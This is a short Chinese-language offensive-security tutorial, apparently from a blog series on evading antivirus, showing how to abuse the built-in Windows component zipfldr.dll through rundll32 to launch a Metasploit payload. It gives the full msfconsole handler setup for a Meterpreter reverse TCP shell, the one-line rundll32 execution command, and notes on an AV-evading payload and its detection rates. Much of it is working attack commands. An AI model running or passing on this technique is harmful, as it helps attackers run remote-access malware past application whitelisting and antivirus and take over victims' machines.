當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
0x01 zipfldr.dll 簡介
zipfldr.dll自Windows xp開始自帶的zip文件壓縮/解壓工具組件。
說明:zipfldr.dll所在路徑已被系統添加PATH環境變量中,因此,zipfldr.dll命令可識別,但由於爲dll文件,需調用rundll32.exe來執行。Windows 2003 默認位置:
C:\Windows\System32\zipfldr.dll
C:\Windows\SysWOW64\zipfldr.dll
Windows 7 默認位置:
C:\Windows\System32\zipfldr.dll
C:\Windows\SysWOW64\zipfldr.dll
0x02 使用zipfldr.dll 執行payload
攻擊機:10.211.55.10 kali
靶機:10.211.55.18 win7
由AVIator生成msf.exe。具體參考遠控免殺專題(14)-AVIator(VT免殺率25/69)
將生成的msf.exe木馬移動到靶機上。
metasploit監聽
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.211.55.10
run
靶機執行
rundll32.exe zipfldr.dll,RouteTheCall msf.exe
360提示惡意命令執行。點擊允許後可上線
放在virustotal.com上msf.exe查殺率爲19/69
參考鏈接:
基於白名單zipfldr.dll執行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/90_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95zipfldr.dll%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E5%85%AB%E5%AD%A3.html
雖然我們生活在陰溝裏,但依然有人仰望星空!